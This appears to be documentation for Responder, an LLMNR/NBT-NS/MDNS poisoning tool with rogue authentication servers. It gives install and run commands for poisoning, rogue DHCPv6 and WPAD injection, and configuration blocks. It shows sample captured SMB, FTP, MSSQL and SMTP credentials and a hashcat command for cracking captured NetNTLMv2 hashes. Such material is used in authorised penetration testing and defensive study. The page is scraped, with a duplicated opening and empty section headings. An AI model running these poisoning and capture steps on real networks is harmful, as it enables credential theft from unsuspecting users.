
Responder is a LLMNR, NBT-NS and MDNS poisoner, with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication server supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.
Responder is a LLMNR, NBT-NS, and MDNS poisoner with built-in rogue authentication servers for HTTP, SMB, MSSQL, FTP, LDAP, Kerberos, DNS, and more. It supports NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP, and various authentication methods across 15+ protocols.
Responder captures credentials by responding to LLMNR, NBT-NS, and MDNS name resolution requests. When a client attempts to resolve a non-existent hostname, Responder answers, directing the client to the attacker's machine where multiple rogue authentication servers capture credentials. DHCP, DHCPv6 rogue servers are also included and can be enabled separately.
Captured Data:
This version includes:
sudo apt-get update
sudo apt-get install python3 python3-pip python3-netifaces
git clone https://github.com/lgandx/Responder.git
cd Responder
pip3 install -r requirements.txt
sudo python3 Responder.py --help
# Standard LLMNR/NBT-NS poisoning
sudo python3 Responder.py -I eth0 -v
# Analyze mode (passive monitoring)
sudo python3 Responder.py -I eth0 -A -v
# Edit Responder.conf first:
# [DHCPv6 Server]
# DHCPv6_Domain = corp.local
sudo python3 Responder.py -I eth0 --dhcpv6 -v
sudo python3 Responder.py -I eth0 -b -v
# Enable Proxy-auth server with rogue DHCP server injecting WPAD server (highly effective)
sudo python3 Responder.py -I eth0 -Pvd
Purpose: Respond to name resolution failures
How it works:
Configuration:
[Responder Core]
LLMNR = On
NBTNS = On
MDNS = On
Usage:
sudo python3 Responder.py -I eth0 -v
Purpose: Force clients to use attacker's DNS via IPv6
Features:
How it works:
Configuration:
[DHCPv6 Server]
; Only respond to specific domain
DHCPv6_Domain = corp.local
; Send Router Advertisements
SendRA = Off
; IPv6 address to advertise
BindToIPv6 = fe80::1
Usage:
sudo python3 Responder.py -I eth0 --dhcpv6 -v
Expected Output:
[DHCPv6] INFORMATION-REQUEST from fe80::a1b2:c3d4
[DHCPv6] Client domain: workstation.corp.local
[DHCPv6] Matched target domain: corp.local
[DHCPv6] Responding with DNS: fe80::1
[DNS] Query: mail.corp.local (A)
[DNS] Poisoned: mail.corp.local -> 192.168.1.100
[SMTP] Captured: [email protected]:Password123
Responder includes 17+ rogue authentication servers:
Purpose: Capture NetNTLM hashes from file shares
Features:
Triggers:
# UNC paths
\\attacker-ip\share
\\non-existent-server\files
# NET USE commands
net use \\attacker-ip\share
# Windows Explorer address bar
\\attacker-ip\
Captured Format:
username::domain:challenge:response:blob
Cracking:
hashcat -m 5600 smb-ntlmv2.txt wordlist.txt
Configuration:
[Responder Core]
SMB = On
Purpose: Capture cleartext FTP credentials
Features:
Triggers:
ftp attacker-ip
# Username: anything
# Password: anything
Captured Format:
[FTP] Cleartext: username:password
Configuration:
[Responder Core]
FTP = On
Purpose: Capture Microsoft SQL Server authentication
Features:
Triggers:
-- SQL Server Management Studio
Server: attacker-ip
Authentication: SQL Server / Windows
-- Command line
sqlcmd -S attacker-ip -U sa -P password
-- Connection strings
Server=attacker-ip;Database=master;User Id=sa;Password=pass;
Captured Formats:
[MSSQL] SQL Auth: sa:password123
[MSSQL] NetNTLMv2: DOMAIN\user::domain:challenge:response:blob
Configuration:
[Responder Core]
SQL = On
Notes:
Purpose: Capture email client authentication
Features:
STARTTLS Flow:
Client → EHLO
Server → 250-STARTTLS
Client → STARTTLS
Server → 220 Ready to start TLS
[TLS handshake using self-signed cert]
Client → AUTH PLAIN <credentials>
Server → Captured! ✅
Triggers:
Email client configuration:
- Server: attacker-ip
- Port: 25 or 587
- Security: STARTTLS or None
- Username: anything
- Password: anything
Captured Formats:
[SMTP] LOGIN: [email protected]:Password123
[SMTP] NetNTLMv2: user::DOMAIN:challenge:response:blob
[SMTP] CRAM-MD5: user:challenge:response
Configuration:
[Responder Core]
SMTP = On
Certificate Warnings: Self-signed cert warnings are normal. Clients reject first attempt, retry, and succeed. Credentials still captured.